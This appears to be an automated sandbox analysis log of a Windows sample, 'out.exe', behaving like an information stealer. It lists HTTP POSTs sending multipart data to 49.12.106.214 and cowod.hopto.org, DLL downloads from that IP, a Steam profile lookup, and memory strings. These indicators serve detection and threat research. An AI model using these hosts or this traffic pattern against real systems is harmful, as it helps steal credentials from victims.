                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 114269Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3193Connection: Keep-AliveCache-Control: no-cache
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00026963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00026963
                              Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                              Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.HJKFIEBFHJKK
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.BFHJKK
                              Source: out.exe, 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.org
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                              Source: out.exe, 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.orgJKK
                              Source: out.exeString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hoptoEBFHJKK
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: out.exe, out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                              Source: out.exe, 00000000.00000002.2682048291.000000002789D000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                              Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://49.12.106.214
                              Source: out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/
                              Source: out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/&
                              Source: out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/3
